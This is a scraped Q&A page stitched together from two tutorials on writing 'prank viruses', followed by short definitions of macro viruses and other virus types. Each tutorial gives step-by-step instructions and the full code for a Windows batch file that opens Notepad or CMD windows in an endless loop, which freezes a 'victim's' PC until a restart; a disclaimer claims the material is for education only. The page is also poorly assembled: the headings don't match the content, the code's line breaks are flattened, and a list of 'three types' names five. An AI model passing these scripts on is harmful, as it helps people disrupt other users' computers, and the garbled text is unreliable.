Which type of virus is written as a list of commands that can be set automatically?

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    The virus that we are going to create in this article will automatically open up multiple windows in the victim’s Windows PC.

    This is an annoying type of Virus because as per the heading this is capable to open the multiple window screen in front of the user without allowing the user to open any other file that he/she wants to work after the activation of this virus file, and also freeze the PC.

    Now to create the virus follow the below steps:

    Step 1: Press the Window + R Button from the Keyboard. This will open the Run Dialog book will Open in front of us. 

    Step 2: Type Notepad in the Dialog Box and press Enter. This will open the notepad for us.

    Step 3: Type in the below-mentioned code in the Notepad:

    @Echo off :top START %systemRoot%\System32\notepad.exe GoTo top

    Step 4: After typing in all the code save the file with the name of your choice. But remember to save the file with .bat extension.

    The Virus has been Successfully Created by you but this will only work when it is opened by the user once.

    To Resolve this problem the user must restart the PC. 

    Disclaimer: GeeksforGeeks does not support the spread of ransomware/viruses and if you intend to use this information for malicious purposes, we are in no way responsible. This information is intended to be used for educational purposes only.

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    The virus that we are going to create in this article will automatically open up multiple CMD windows in the victim’s Windows PC.

    This is an annoying type of Virus because as per the heading this is capable of opening multiple CMD window screen in front of the user without allowing the user to open any other file that he/she wants to work after the activation of this virus file, and also freeze the PC.

    Now to create the virus follow the below steps:

    Step 1: Press the Window + R Button from the Keyboard. This will open the Run Dialog book will Open in front of us. 

    Step 2: Type Notepad in the Dialog Box and press Enter. This will open the notepad for us.

    Step 3: Type in the below-mentioned code in the Notepad:

    :A START goto A

    Step 4: After typing in all the code save the file with the name of your choice. But remember to save the file with .bat extension.

    The Virus has been Successfully Created by you but this will only work when it is opened by the user once.

    To Resolve this problem the user must restart the PC. 

    Disclaimer: GeeksforGeeks does not support the spread of ransomware/viruses and if you intend to use this information for malicious purposes, we are in no way responsible. This information is intended to be used for educational purposes only.

    What type of virus is written as a list of commands that can be set automatically to run as soon as a computer user opens the file?

    The macro virus replaces regular commands with the same name and runs when the command is selected. These malicious macros may start automatically when a document is opened or closed, without the user's knowledge. Once a file containing a macro virus is opened, the virus can infect the system.

    Which type of virus is written as a list of commands?

    When a macro virus infects an application, it executes a series of commands and a sequence of actions that begin automatically when the application is opened. An infected macro that is executed typically infects every document on a user's computer.

    What are the 3 types of viruses?

    Types of Computer Viruses.
    Direct Action Virus. When a user executes a seemingly harmless file attached with malicious code, direct action viruses deliver a payload immediately. ... .
    Polymorphic Virus. ... .
    File Infector Virus. ... .
    Multipartite Virus. ... .
    Macro Virus..

    What is macro virus in computer?

    In terms of cybersecurity, a macro virus is a kind of virus that's written in macro, a programming language rooted inside software applications like Microsoft Office. This programming language is handy because it allows users to automate tasks into a few keystrokes and enhance workflow.


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